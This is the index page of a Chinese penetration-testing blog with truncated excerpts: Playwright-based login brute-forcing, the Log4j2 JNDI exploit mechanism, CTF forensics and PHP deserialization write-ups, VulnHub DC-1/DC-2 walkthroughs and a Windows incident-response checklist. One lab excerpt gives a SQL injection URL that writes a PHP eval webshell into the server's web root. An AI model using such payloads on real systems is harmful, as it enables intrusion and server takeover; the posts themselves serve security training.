北轨的博客

​ 做渗透测试的时候经常会遇到登录界面对密码进行前端加密的方式，被加密后的密码我们无法直接使用爆破工具对账号密码进行暴力破解登录，一般来说这种情况有两种解决办法，一是在js文件中找到对应的加密算法，对加密数据进行逆向操作，对发包工具中的明文密码进行加密，从而进行暴力破解，二是我们使用python脚本进行自动化处理从而模拟浏览器的正常请求，进行暴力破解，今天演示第二种方法，如何使用playwright模块编写python脚本绕过前端加密进行爆破操作。 ​ 这里我编写了两个版本，分别是无验证码版本与有验证码版本，用来应对两种不同环境。 ​ playwrite支持录制脚本功能，当我们不知如何使用函数来进行模拟操作时，我们使用下面这条命令来对我们手动操作进行录制。 1playwright.exe codegen -o test2.py --target python http://www.xxxx.com ​ 这条命令会调用playwright的默认浏览器打开我们命令中指定网站并弹出代码框，当我们点击浏览器时，代码框会记录下我们进行的操作，并以代码的形式呈现。这样在我们编写脚本时便 ...

Apache Log4j2影响范围​ Apache Log4j 2.x<★Apache Shiro★=2.14.1 受影响的应用及组件​ Spring-Boot-Strater-log4j2、Apache Solr、Apache Flink、Apache Druid 原理Apache Log4j 是 Apache 的一个开源项目，Apache Log4j2是一个基于Java的日志记录工具。该工具重写了Log4j框架，并且引入了大量丰富的特性。我们可以控制日志信息输送的目的地为控制台、文件、GUI组件等，通过定义每一条日志信息的级别，能够更加细致地控制日志的生成过程。该日志框架被大量用于业务系统开发，用来记录日志信息。 大概的执行逻辑​ 黑客在自己的客户端启动一个带有恶意代码的 rmi 服务，通过服务端的log4j 的漏洞，向服务端的 jndi context lookup 的时候连接自己的 rmi 服务器，服务端连接 rmi 服务器执行 lookup 的时候会通过 rmi 查询到该地址指向的引用并且本地实例化这个类，所以在类中的构造方法或者静态代码块中 ...

异常的文件 现存在一份被黑客攻击修改了的工程文件，请应急工作人员找出黑客攻击的痕迹，flag格式为：flag{}。 下载得到压缩包，根据题目描述的提示我们可以得知，此题是需要我们对被修改后的文件，进行痕迹查找，通常在进行痕迹查找是我们用查找日志的方法比较多，这里我们理解出题的考点就是要在众多零碎的文件中找到，特定的痕迹(flag)。 123strings $(find | xargs) | grep flag#“|”管道符，将标准输出流转换为标准输入流#“xargs” 将是将标准输入转为命令行参数，一般搭配管道符“|”使用 简单的Modbus协议分析 由于操作员操作不当导致化工车间蒸馏塔控制器程序出错，请分析错误程序查找错误点并获得flag，flag格式为flag{}。 使用wireshark打开t3.pacp后过滤modbus协议，发现流量包中并未存在使用modbus进行流量传输，之后使用strings命令发现存在可疑16进制字符串，将16进制转ASCII得到flag 12666c61677b444773775466677931474432333666733273664632 ...

前台界面sql注入进入界面是封神台的招牌猫舍，大家都知道这个界面存在sql注入，经过测试这个确实也存在sql注入，但这个靶场考察点是内网渗透所以重点并不在sql这边。 通过sql注入拿到webshell使用sqlmap进行注入的到服务器系统及mysql路径信息,可以看到服务器为windows服务器，后端语言是PHP5，mysql路径为c:/phpstudy/mysql，根据mysql路径可以得出网站使用phpstudy做集成系统，推测网站主目录在c:/phpstudy/www目录下。 使用sql语句讲一句话木马写入网站当中，并命名为bg.php 1http://afsgr16-b1ferw.aqlab.cn/?id=7 union select 1,'<?php eval($_POST[123]) ?>' into dumpfile 'C:/phpStudy/www/bg1.php' 使用蚁剑连接一句话木马,成功连接，并得到服务器的 系统版本为Windows Server 2008 R2 ...

​ 在博客上记录一下强网杯两道做出的web题目的详细解析，因为题目已经关闭，所以只能通过源码加解释的方法对题目进行解析，我会尽量解析的比较细致。 rcefile首先打开页面为文件上传功能页面，根据比赛经验，此类题目通常会给你读取源码的方法，这里我们直接尝试www.zip,成功下载到源码 12345678910111213<?phpspl_autoload_register();error_reporting(0);function e($str){ return htmlspecialchars($str);}$userfile = empty($_COOKIE["userfile"]) ? [] : unserialize($_COOKIE["userfile"]);?><p> <a href="/index.php">Index</a> <a href="/showfile.php">files</a ...

有道云笔记 (youdao.com) 强国杯初赛最终排名全国第17.也是顺利的进入了半决赛，校队的WP链接放在这作为保存备份

前言最近在刷题过程中发现对PHP反序列化的理解还不够深刻，对于其如何通过序列化的漏洞达到执行恶意代码的过程不够清晰，于是我将遇到的PHP反序列化题目整理到这篇文章中，后续将会持续更新 如果对php反序列化的概念还不了解，可以看我之前的文章PHP中的反序列化 | 北轨的博客 (beigui.xyz) 第一题 反序列化和文件包含的简单结合123456789101112131415161718192021222324252627282930<?php# 第一部分 包含flag.phpinclude "flag.php";#第二部分 创建connection类并传递file参数class Connection{ public $file; public function __construct($file) { $this->file = $file; } public function __sleep() { $this->file = 's ...

前言这篇文章是vulnhub靶场DC系列复现的第二篇，需要用到的知识点，如下 字典生成工具cewl（flag2） wpsacn(flag2) rbash逃逸（flag4） git提权（flag5） 靶机地址：DC： 2 ~ VulnHub 靶场描述（官网机翻）与DC-1非常相似，DC-2是另一个专门构建的易受攻击的实验室，目的是在渗透测试领域获得经验。 与最初的DC-1一样，它的设计考虑了初学者的需求。 Linux技能和熟悉Linux命令行是必须的，基本的渗透测试工具的一些经验也是如此。 就像DC-1一样，有五个标志，包括最终标志。 同样，就像DC-1一样，这些标志对初学者来说很重要，但对那些有经验的人来说并不那么重要。 简而言之，唯一真正重要的标志是最终的标志。 对于初学者来说，谷歌是你的朋友。好吧，除了所有的隐私问题等等。 我还没有探索所有实现root的方法，因为我放弃了我一直在研究的先前版本，除了基本的操作系统安装之外，我开始了全新的工作。 信息收集1.靶场搭建环节跟DC1一样流程，在搭建好靶机后，将靶机网络环境改为NAT模式。使用nmap对网段进行存活主机检测，其中IP为1 ...

前言最近在家空闲时间增多，遂将vulhub靶场复现记录一番，第一篇文章从DC1开始写起，DC系列靶场在官方描述中属于初级靶场，所以我们先由DC1开始由浅入深。 靶场描述(官网机翻)DC-1是一个专门构建的易受攻击的实验室，目的是获得渗透测试领域的经验。 它旨在为初学者带来挑战，但它的难易程度将取决于您的技能和知识以及您的学习能力。 要成功完成此挑战，您将需要Linux技能，熟悉Linux命令行以及基本渗透测试工具的经验，例如可以在Kali Linux或Parrot Security OS上找到的工具。 有多种方法可以获得根，但是，我已经包含了一些包含初学者线索的标志。 总共有五个标志，但最终目标是在根的主目录中查找并读取该标志。您甚至不需要是root就可以执行此操作，但是，您将需要root权限。 根据您的技能水平，您可以跳过查找这些标志中的大多数，并直接找到根。 初学者可能会遇到以前从未遇到过的挑战，但是Google搜索应该是获得完成此挑战所需信息所需的全部内容。 环境搭建在官网下载DC1的系统压缩包 https://download.vulnhub.com/dc/DC-1.zip 将 ...

当企业发生黑客入侵、系统崩溃或其他影响业务正常运行的安全事件时，急需第一时间进行处理，使企业的网络信息系统在最短的时间内恢复正常工作，进一步查找入侵来源，还原入侵事故过程，同时给出解决方案与防范措施，为企业挽回或减少经济损失。 常见的应急响应事件分类： web入侵：网页挂马、主页篡改、Webshell 系统入侵：病毒木马、勒索软件、远控后门 网络攻击：DDOS攻击、DNS劫持、ARP欺骗 针对常见的攻击事件，结合工作中应急响应事件分析和解决的方法，总结了一些Window服务器入侵排查的思路。 0x01 入侵排查思路一、检查系统账号安全1.查看服务器是否有弱口令，远程管理端口是否对往公网开放。检查方法： a、根据实际情况咨询相关服务器管理员。 b、根据弱口令检查工具来检查弱口令。 2.查看服务器是否存在可疑账号、新增账号。检查方法： 打开cmd窗口，输入lusrmgr.msc命令，查看是否有新增/可疑的账号，如有管理员群组的（Administrator）里的新增账号，请立即禁用或删除。 3.查看服务器是否存在隐藏账号、克隆账号。检查方法： a、打开注册表，查看管理 ...